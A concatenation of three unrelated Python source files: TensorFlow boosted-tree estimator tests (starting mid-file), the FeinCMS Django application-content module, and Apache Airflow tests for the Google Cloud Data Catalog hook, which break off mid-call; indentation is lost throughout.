def testFitAndEvaluateMultiClassDiagonalDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 3
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
n_classes=learner_config.num_classes,
num_trees=1,
examples_per_layer=7,
model_dir=model_dir,
config=config,
center_bias=False,
feature_columns=[contrib_feature_column.real_valued_column("x")])
classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
classifier.export(self._export_dir_base)
result_iter = classifier.predict(input_fn=_eval_input_fn)
for prediction_dict in result_iter:
self.assertTrue("classes" in prediction_dict)
def testFitAndEvaluateMultiClassFullDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 3
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.FULL_HESSIAN)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
n_classes=learner_config.num_classes,
num_trees=1,
examples_per_layer=7,
model_dir=model_dir,
config=config,
center_bias=False,
feature_columns=[contrib_feature_column.real_valued_column("x")])
classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
classifier.export(self._export_dir_base)
result_iter = classifier.predict(input_fn=_eval_input_fn)
for prediction_dict in result_iter:
self.assertTrue("classes" in prediction_dict)
# One dimensional quantile regression.
def testQuantileRegression(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
learner_config.growing_mode = learner_pb2.LearnerConfig.WHOLE_TREE
learner_config.constraints.min_node_weight = 1 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.l2 = 1.0 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.l1 = 1.0 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.tree_complexity = (
1.0 / _QUANTILE_REGRESSION_SIZE)
train_input_fn, test_input_fn, y = _quantile_regression_input_fns()
# 95% percentile.
model_upper = estimator.GradientBoostedDecisionTreeQuantileRegressor(
quantiles=[0.95],
learner_config=learner_config,
num_trees=100,
examples_per_layer=_QUANTILE_REGRESSION_SIZE,
center_bias=False)
model_upper.fit(input_fn=train_input_fn, steps=1000)
result_iter = model_upper.predict(input_fn=test_input_fn)
upper = []
for prediction_dict in result_iter:
upper.append(prediction_dict["scores"])
frac_below_upper = round(1. * np.count_nonzero(upper > y) / len(y), 3)
# +/- 3%
self.assertTrue(frac_below_upper >= 0.92)
self.assertTrue(frac_below_upper <= 0.98)
train_input_fn, test_input_fn, _ = _quantile_regression_input_fns()
model_lower = estimator.GradientBoostedDecisionTreeQuantileRegressor(
quantiles=[0.05],
learner_config=learner_config,
num_trees=100,
examples_per_layer=_QUANTILE_REGRESSION_SIZE,
center_bias=False)
model_lower.fit(input_fn=train_input_fn, steps=1000)
result_iter = model_lower.predict(input_fn=test_input_fn)
lower = []
for prediction_dict in result_iter:
lower.append(prediction_dict["scores"])
frac_above_lower = round(1. * np.count_nonzero(lower < y) / len(y), 3)
# +/- 3%
self.assertTrue(frac_above_lower >= 0.92)
self.assertTrue(frac_above_lower <= 0.98)
class CoreGradientBoostedDecisionTreeEstimators(test_util.TensorFlowTestCase):
def testTrainEvaluateInferDoesNotThrowError(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreGradientBoostedDecisionTreeEstimator(
head=head_fn,
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
est.evaluate(input_fn=_eval_input_fn, steps=1)
est.predict(input_fn=_eval_input_fn)
def testRankingDontThrowExceptionForForEstimator(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
est = estimator.CoreGradientBoostedDecisionTreeRanker(
head=head_fn,
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[
core_feature_column.numeric_column("f1"),
core_feature_column.numeric_column("f2")
],
ranking_model_pair_keys=("a", "b"))
# Train for a few steps.
est.train(input_fn=_ranking_train_input_fn, steps=1000)
est.evaluate(input_fn=_ranking_train_input_fn, steps=1)
est.predict(input_fn=_infer_ranking_train_input_fn)
def testFitAndEvaluateMultiClassTreePerClasssDontThrowException(self):
n_classes = 3
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = n_classes
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.TREE_PER_CLASS)
head_fn = estimator.core_multiclass_head(n_classes=n_classes)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
learner_config=learner_config,
head=head_fn,
num_trees=1,
center_bias=False,
examples_per_layer=7,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")])
classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
classifier.predict(input_fn=_eval_input_fn)
def testFitAndEvaluateMultiClassDiagonalDontThrowException(self):
n_classes = 3
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = n_classes
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
head_fn = estimator.core_multiclass_head(n_classes=n_classes)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
learner_config=learner_config,
head=head_fn,
num_trees=1,
center_bias=False,
examples_per_layer=7,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")])
classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
classifier.predict(input_fn=_eval_input_fn)
def testFitAndEvaluateMultiClassFullDontThrowException(self):
n_classes = 3
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = n_classes
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.FULL_HESSIAN)
head_fn = estimator.core_multiclass_head(n_classes=n_classes)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
learner_config=learner_config,
head=head_fn,
num_trees=1,
center_bias=False,
examples_per_layer=7,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")])
classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
classifier.predict(input_fn=_eval_input_fn)
def testWeightedCategoricalColumn(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
feature_columns = [
core_feature_column.weighted_categorical_column(
categorical_column=core_feature_column
.categorical_column_with_vocabulary_list(
key="word", vocabulary_list=["the", "cat", "dog"]),
weight_feature_key="weight")
]
labels = np.array([[1], [1], [0], [0.]], dtype=np.float32)
def _make_input_fn():
def _input_fn():
features_dict = {}
# Sparse tensor representing
# example 0: "cat","the"
# examaple 1: "dog"
# example 2: -
# example 3: "the"
# Weights for the words are 5 - cat, 6- dog and 1 -the.
features_dict["word"] = sparse_tensor.SparseTensor(
indices=[[0, 0], [0, 1], [1, 0], [3, 0]],
values=constant_op.constant(["the", "cat", "dog", "the"],
dtype=dtypes.string),
dense_shape=[4, 3])
features_dict["weight"] = sparse_tensor.SparseTensor(
indices=[[0, 0], [0, 1], [1, 0], [3, 0]],
values=[1., 5., 6., 1.],
dense_shape=[4, 3])
return features_dict, labels
return _input_fn
est = estimator.CoreGradientBoostedDecisionTreeEstimator(
head=head_fn,
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=feature_columns)
input_fn = _make_input_fn()
est.train(input_fn=input_fn, steps=100)
est.evaluate(input_fn=input_fn, steps=1)
est.predict(input_fn=input_fn)
# One dimensional quantile regression.
def testQuantileRegression(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
learner_config.growing_mode = learner_pb2.LearnerConfig.WHOLE_TREE
learner_config.constraints.min_node_weight = 1 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.l2 = 1.0 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.l1 = 1.0 / _QUANTILE_REGRESSION_SIZE
learner_config.regularization.tree_complexity = (
1.0 / _QUANTILE_REGRESSION_SIZE)
train_input_fn, test_input_fn, y = _quantile_regression_input_fns()
y = y.reshape(_QUANTILE_REGRESSION_SIZE, 1)
# 95% percentile.
model_upper = estimator.CoreGradientBoostedDecisionTreeQuantileRegressor(
quantiles=[0.95],
learner_config=learner_config,
num_trees=100,
examples_per_layer=_QUANTILE_REGRESSION_SIZE,
center_bias=False)
model_upper.train(input_fn=train_input_fn, steps=1000)
result_iter = model_upper.predict(input_fn=test_input_fn)
upper = []
for prediction_dict in result_iter:
upper.append(prediction_dict["predictions"])
frac_below_upper = round(1. * np.count_nonzero(upper > y) / len(y), 3)
# +/- 3%
self.assertTrue(frac_below_upper >= 0.92)
self.assertTrue(frac_below_upper <= 0.98)
train_input_fn, test_input_fn, _ = _quantile_regression_input_fns()
model_lower = estimator.CoreGradientBoostedDecisionTreeQuantileRegressor(
quantiles=[0.05],
learner_config=learner_config,
num_trees=100,
examples_per_layer=_QUANTILE_REGRESSION_SIZE,
center_bias=False)
model_lower.train(input_fn=train_input_fn, steps=1000)
result_iter = model_lower.predict(input_fn=test_input_fn)
lower = []
for prediction_dict in result_iter:
lower.append(prediction_dict["predictions"])
frac_above_lower = round(1. * np.count_nonzero(lower < y) / len(y), 3)
# +/- 3%
self.assertTrue(frac_above_lower >= 0.92)
self.assertTrue(frac_above_lower <= 0.98)
if __name__ == "__main__":
googletest.main()
| |
"""
Third-party application inclusion support.
"""
from __future__ import absolute_import, unicode_literals
from email.utils import parsedate
from time import mktime
from random import SystemRandom
import re
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import (
Resolver404, resolve, reverse, NoReverseMatch,
get_script_prefix, set_script_prefix,
)
from django.db import models
from django.db.models import signals
from django.http import HttpResponse
from django.template.response import TemplateResponse
from django.utils.functional import curry as partial, lazy, wraps
from django.utils.http import http_date
from django.utils.safestring import mark_safe
from django.utils.translation import get_language, ugettext_lazy as _
from feincms.admin.item_editor import ItemEditorForm
from feincms.contrib.fields import JSONField
from feincms.translations import short_language_code
from feincms.utils import get_object
APP_REVERSE_CACHE_GENERATION_KEY = 'FEINCMS:APPREVERSECACHE'
APP_REVERSE_CACHE_TIMEOUT = 300
class UnpackTemplateResponse(TemplateResponse):
"""
Completely the same as marking applicationcontent-contained views with
the ``feincms.views.decorators.unpack`` decorator.
"""
_feincms_unpack = True
def cycle_app_reverse_cache(*args, **kwargs):
"""Does not really empty the cache; instead it adds a random element to the
cache key generation which guarantees that the cache does not yet contain
values for all newly generated keys"""
value = '%07x' % (SystemRandom().randint(0, 0x10000000))
cache.set(APP_REVERSE_CACHE_GENERATION_KEY, value)
return value
# Set the app_reverse_cache_generation value once per startup (at least).
# This protects us against offline modifications of the database.
cycle_app_reverse_cache()
def app_reverse(viewname, urlconf=None, args=None, kwargs=None,
*vargs, **vkwargs):
"""
Reverse URLs from application contents
Works almost like Django's own reverse() method except that it resolves
URLs from application contents. The second argument, ``urlconf``, has to
correspond to the URLconf parameter passed in the ``APPLICATIONS`` list
to ``Page.create_content_type``::
app_reverse('mymodel-detail', 'myapp.urls', args=...)
or
app_reverse('mymodel-detail', 'myapp.urls', kwargs=...)
The second argument may also be a request object if you want to reverse
an URL belonging to the current application content.
"""
# First parameter might be a request instead of an urlconf path, so
# we'll try to be helpful and extract the current urlconf from it
extra_context = getattr(urlconf, '_feincms_extra_context', {})
appconfig = extra_context.get('app_config', {})
urlconf = appconfig.get('urlconf_path', urlconf)
appcontent_class = ApplicationContent._feincms_content_models[0]
cache_key = appcontent_class.app_reverse_cache_key(urlconf)
url_prefix = cache.get(cache_key)
if url_prefix is None:
content = appcontent_class.closest_match(urlconf)
if content is not None:
if urlconf in appcontent_class.ALL_APPS_CONFIG:
# We have an overridden URLconf
app_config = appcontent_class.ALL_APPS_CONFIG[urlconf]
urlconf = app_config['config'].get('urls', urlconf)
prefix = content.parent.get_absolute_url()
prefix += '/' if prefix[-1] != '/' else ''
url_prefix = (urlconf, prefix)
cache.set(cache_key, url_prefix, timeout=APP_REVERSE_CACHE_TIMEOUT)
if url_prefix:
# vargs and vkwargs are used to send through additional parameters
# which are uninteresting to us (such as current_app)
prefix = get_script_prefix()
try:
set_script_prefix(url_prefix[1])
return reverse(
viewname,
url_prefix[0],
args=args,
kwargs=kwargs,
*vargs, **vkwargs)
finally:
set_script_prefix(prefix)
raise NoReverseMatch("Unable to find ApplicationContent for %r" % urlconf)
#: Lazy version of ``app_reverse``
app_reverse_lazy = lazy(app_reverse, str)
def permalink(func):
"""
Decorator that calls app_reverse()
Use this instead of standard django.db.models.permalink if you want to
integrate the model through ApplicationContent. The wrapped function
must return 4 instead of 3 arguments::
class MyModel(models.Model):
@appmodels.permalink
def get_absolute_url(self):
return ('myapp.urls', 'model_detail', (), {'slug': self.slug})
"""
def inner(*args, **kwargs):
return app_reverse(*func(*args, **kwargs))
return wraps(func)(inner)
APPLICATIONCONTENT_RE = re.compile(r'^([^/]+)/([^/]+)$')
class ApplicationContent(models.Model):
#: parameters is used to serialize instance-specific data which will be
# provided to the view code. This allows customization (e.g. "Embed
# MyBlogApp for blog <slug>")
parameters = JSONField(null=True, editable=False)
ALL_APPS_CONFIG = {}
class Meta:
abstract = True
verbose_name = _('application content')
verbose_name_plural = _('application contents')
@classmethod
def initialize_type(cls, APPLICATIONS):
for i in APPLICATIONS:
if not 2 <= len(i) <= 3:
raise ValueError(
"APPLICATIONS must be provided with tuples containing at"
" least two parameters (urls, name) and an optional extra"
" config dict")
urls, name = i[0:2]
if len(i) == 3:
app_conf = i[2]
if not isinstance(app_conf, dict):
raise ValueError(
"The third parameter of an APPLICATIONS entry must be"
" a dict or the name of one!")
else:
app_conf = {}
cls.ALL_APPS_CONFIG[urls] = {
"urls": urls,
"name": name,
"config": app_conf
}
cls.add_to_class(
'urlconf_path',
models.CharField(_('application'), max_length=100, choices=[
(c['urls'], c['name']) for c in cls.ALL_APPS_CONFIG.values()])
)
class ApplicationContentItemEditorForm(ItemEditorForm):
app_config = {}
custom_fields = {}
def __init__(self, *args, **kwargs):
super(ApplicationContentItemEditorForm, self).__init__(
*args, **kwargs)
instance = kwargs.get("instance", None)
if instance:
try:
# TODO use urlconf_path from POST if set
# urlconf_path = request.POST.get('...urlconf_path',
# instance.urlconf_path)
self.app_config = cls.ALL_APPS_CONFIG[
instance.urlconf_path]['config']
except KeyError:
self.app_config = {}
self.custom_fields = {}
admin_fields = self.app_config.get('admin_fields', {})
if isinstance(admin_fields, dict):
self.custom_fields.update(admin_fields)
else:
get_fields = get_object(admin_fields)
self.custom_fields.update(
get_fields(self, *args, **kwargs))
params = self.instance.parameters
for k, v in self.custom_fields.items():
v.initial = params.get(k)
self.fields[k] = v
if k in params:
self.fields[k].initial = params[k]
def save(self, commit=True, *args, **kwargs):
# Django ModelForms return the model instance from save. We'll
# call save with commit=False first to do any necessary work &
# get the model so we can set .parameters to the values of our
# custom fields before calling save(commit=True)
m = super(ApplicationContentItemEditorForm, self).save(
commit=False, *args, **kwargs)
m.parameters = dict(
(k, self.cleaned_data[k])
for k in self.custom_fields if k in self.cleaned_data)
if commit:
m.save(**kwargs)
return m
# This provides hooks for us to customize the admin interface for
# embedded instances:
cls.feincms_item_editor_form = ApplicationContentItemEditorForm
# Clobber the app_reverse cache when saving application contents
# and/or pages
page_class = cls.parent.field.rel.to
signals.post_save.connect(cycle_app_reverse_cache, sender=cls)
signals.post_delete.connect(cycle_app_reverse_cache, sender=cls)
signals.post_save.connect(cycle_app_reverse_cache, sender=page_class)
signals.post_delete.connect(cycle_app_reverse_cache, sender=page_class)
def __init__(self, *args, **kwargs):
super(ApplicationContent, self).__init__(*args, **kwargs)
self.app_config = self.ALL_APPS_CONFIG.get(
self.urlconf_path, {}).get('config', {})
def process(self, request, **kw):
page_url = self.parent.get_absolute_url()
# Provide a way for appcontent items to customize URL processing by
# altering the perceived path of the page:
if "path_mapper" in self.app_config:
path_mapper = get_object(self.app_config["path_mapper"])
path, page_url = path_mapper(
request.path,
page_url,
appcontent_parameters=self.parameters
)
else:
path = request._feincms_extra_context['extra_path']
# Resolve the module holding the application urls.
urlconf_path = self.app_config.get('urls', self.urlconf_path)
try:
fn, args, kwargs = resolve(path, urlconf_path)
except (ValueError, Resolver404):
raise Resolver404(str('Not found (resolving %r in %r failed)') % (
path, urlconf_path))
# Variables from the ApplicationContent parameters are added to request
# so we can expose them to our templates via the appcontent_parameters
# context_processor
request._feincms_extra_context.update(self.parameters)
# Save the application configuration for reuse elsewhere
request._feincms_extra_context.update({
'app_config': dict(
self.app_config,
urlconf_path=self.urlconf_path,
),
})
view_wrapper = self.app_config.get("view_wrapper", None)
if view_wrapper:
fn = partial(
get_object(view_wrapper),
view=fn,
appcontent_parameters=self.parameters
)
output = fn(request, *args, **kwargs)
if isinstance(output, HttpResponse):
if self.send_directly(request, output):
return output
elif output.status_code == 200:
if self.unpack(request, output) and 'view' in kw:
# Handling of @unpack and UnpackTemplateResponse
kw['view'].template_name = output.template_name
kw['view'].request._feincms_extra_context.update(
output.context_data)
else:
# If the response supports deferred rendering, render the
# response right now. We do not handle template response
# middleware.
if hasattr(output, 'render') and callable(output.render):
output.render()
self.rendered_result = mark_safe(
output.content.decode('utf-8'))
self.rendered_headers = {}
# Copy relevant headers for later perusal
for h in ('Cache-Control', 'Last-Modified', 'Expires'):
if h in output:
self.rendered_headers.setdefault(
h, []).append(output[h])
elif isinstance(output, tuple) and 'view' in kw:
kw['view'].template_name = output[0]
kw['view'].request._feincms_extra_context.update(output[1])
else:
self.rendered_result = mark_safe(output)
return True # successful
def send_directly(self, request, response):
mimetype = response.get('Content-Type', 'text/plain')
if ';' in mimetype:
mimetype = mimetype.split(';')[0]
mimetype = mimetype.strip()
return (response.status_code != 200
or request.is_ajax()
or getattr(response, 'standalone', False)
or mimetype not in ('text/html', 'text/plain'))
def unpack(self, request, response):
return getattr(response, '_feincms_unpack', False)
def render(self, **kwargs):
return getattr(self, 'rendered_result', '')
def finalize(self, request, response):
headers = getattr(self, 'rendered_headers', None)
if headers:
self._update_response_headers(request, response, headers)
def _update_response_headers(self, request, response, headers):
"""
Combine all headers that were set by the different content types
We are interested in Cache-Control, Last-Modified, Expires
"""
# Ideally, for the Cache-Control header, we'd want to do some
# intelligent combining, but that's hard. Let's just collect and unique
# them and let the client worry about that.
cc_headers = set(('must-revalidate',))
for x in (cc.split(",") for cc in headers.get('Cache-Control', ())):
cc_headers |= set((s.strip() for s in x))
if len(cc_headers):
response['Cache-Control'] = ", ".join(cc_headers)
else: # Default value
response['Cache-Control'] = 'no-cache, must-revalidate'
# Check all Last-Modified headers, choose the latest one
lm_list = [parsedate(x) for x in headers.get('Last-Modified', ())]
if len(lm_list) > 0:
response['Last-Modified'] = http_date(mktime(max(lm_list)))
# Check all Expires headers, choose the earliest one
lm_list = [parsedate(x) for x in headers.get('Expires', ())]
if len(lm_list) > 0:
response['Expires'] = http_date(mktime(min(lm_list)))
@classmethod
def app_reverse_cache_key(self, urlconf_path, **kwargs):
cache_generation = cache.get(APP_REVERSE_CACHE_GENERATION_KEY)
if cache_generation is None:
# This might never happen. Still, better be safe than sorry.
cache_generation = cycle_app_reverse_cache()
return 'FEINCMS:%s:APPCONTENT:L%s:U%s:G%s' % (
getattr(settings, 'SITE_ID', 0),
get_language(),
urlconf_path,
cache_generation)
@classmethod
def closest_match(cls, urlconf_path):
page_class = cls.parent.field.rel.to
contents = cls.objects.filter(
parent__in=page_class.objects.active(),
urlconf_path=urlconf_path,
).order_by('pk').select_related('parent')
if len(contents) > 1:
try:
current = short_language_code(get_language())
return [
content for content in contents if
short_language_code(content.parent.language) == current
][0]
except (AttributeError, IndexError):
pass
try:
return contents[0]
except IndexError:
pass
return None
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from copy import deepcopy
from typing import Dict, Sequence, Tuple
from unittest import TestCase, mock
import pytest
from google.api_core.retry import Retry
from google.cloud.datacatalog import CreateTagRequest, CreateTagTemplateRequest, Entry, Tag, TagTemplate
from google.protobuf.field_mask_pb2 import FieldMask
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.datacatalog import CloudDataCatalogHook
from tests.providers.google.cloud.utils.base_gcp_mock import (
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
TEST_GCP_CONN_ID: str = "test-gcp-conn-id"
TEST_DELEGATE_TO: str = "test-delegate-to"
TEST_LOCATION: str = "europe-west-3b"
TEST_ENTRY_ID: str = "test-entry-id"
TEST_ENTRY: Dict = {}
TEST_RETRY: Retry = Retry()
TEST_TIMEOUT: float = 4
TEST_METADATA: Sequence[Tuple[str, str]] = ()
TEST_ENTRY_GROUP_ID: str = "test-entry-group-id"
TEST_ENTRY_GROUP: Dict = {}
TEST_TAG: Dict = {}
TEST_TAG_TEMPLATE_ID: str = "test-tag-template-id"
TEST_TAG_TEMPLATE: Dict = {"name": TEST_TAG_TEMPLATE_ID}
TEST_TAG_TEMPLATE_FIELD_ID: str = "test-tag-template-field-id"
TEST_TAG_TEMPLATE_FIELD: Dict = {}
TEST_FORCE: bool = False
TEST_READ_MASK: FieldMask = FieldMask(paths=["name"])
TEST_RESOURCE: str = "test-resource"
TEST_PAGE_SIZE: int = 50
TEST_LINKED_RESOURCE: str = "test-linked-resource"
TEST_SQL_RESOURCE: str = "test-sql-resource"
TEST_NEW_TAG_TEMPLATE_FIELD_ID: str = "test-new-tag-template-field-id"
TEST_SCOPE: Dict = {"include_project_ids": ["example-scope-project"]}
TEST_QUERY: str = "test-query"
TEST_ORDER_BY: str = "test-order-by"
TEST_UPDATE_MASK: Dict = {"fields": ["name"]}
TEST_PARENT: str = "test-parent"
TEST_NAME: str = "test-name"
TEST_TAG_ID: str = "test-tag-id"
TEST_LOCATION_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}"
TEST_ENTRY_PATH: str = (
f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}/entries/{TEST_ENTRY_ID}"
)
TEST_ENTRY_GROUP_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}"
TEST_TAG_TEMPLATE_PATH: str = f"projects/{{}}/locations/{TEST_LOCATION}/tagTemplates/{TEST_TAG_TEMPLATE_ID}"
TEST_TAG_TEMPLATE_FIELD_PATH: str = (
f"projects/{{}}/locations/{TEST_LOCATION}/tagTemplates/"
+ f"{TEST_TAG_TEMPLATE_ID}/fields/{TEST_TAG_TEMPLATE_FIELD_ID}"
)
TEST_TAG_PATH: str = (
f"projects/{{}}/locations/{TEST_LOCATION}/entryGroups/{TEST_ENTRY_GROUP_ID}"
+ f"/entries/{TEST_ENTRY_ID}/tags/{TEST_TAG_ID}"
)
TEST_PROJECT_ID_1 = "example-project-1"
TEST_PROJECT_ID_2 = "example-project-2"
TEST_CREDENTIALS = mock.MagicMock()
class TestCloudDataCatalog(TestCase):
def setUp(
self,
) -> None:
with mock.patch(
"airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudDataCatalogHook(gcp_conn_id="test")
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_lookup_entry_with_linked_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.lookup_entry(
linked_resource=TEST_LINKED_RESOURCE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.lookup_entry.assert_called_once_with(
request=dict(linked_resource=TEST_LINKED_RESOURCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_lookup_entry_with_sql_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.lookup_entry(
sql_resource=TEST_SQL_RESOURCE, retry=TEST_RETRY, timeout=TEST_TIMEOUT, metadata=TEST_METADATA
)
mock_get_conn.return_value.lookup_entry.assert_called_once_with(
request=dict(sql_resource=TEST_SQL_RESOURCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_lookup_entry_without_resource(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(
AirflowException, match=re.escape("At least one of linked_resource, sql_resource should be set.")
):
self.hook.lookup_entry(retry=TEST_RETRY, timeout=TEST_TIMEOUT, metadata=TEST_METADATA)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_search_catalog(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.search_catalog(
scope=TEST_SCOPE,
query=TEST_QUERY,
page_size=TEST_PAGE_SIZE,
order_by=TEST_ORDER_BY,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.search_catalog.assert_called_once_with(
request=dict(
scope=TEST_SCOPE, query=TEST_QUERY, page_size=TEST_PAGE_SIZE, order_by=TEST_ORDER_BY
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
class TestCloudDataCatalogWithDefaultProjectIdHook(TestCase):
def setUp(
self,
) -> None:
with mock.patch(
"airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudDataCatalogHook(gcp_conn_id="test")
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
entry=TEST_ENTRY,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_entry.assert_called_once_with(
request=dict(
parent=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
entry_id=TEST_ENTRY_ID,
entry=TEST_ENTRY,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_entry_group(
location=TEST_LOCATION,
entry_group_id=TEST_ENTRY_GROUP_ID,
entry_group=TEST_ENTRY_GROUP,
retry=TEST_RETRY,
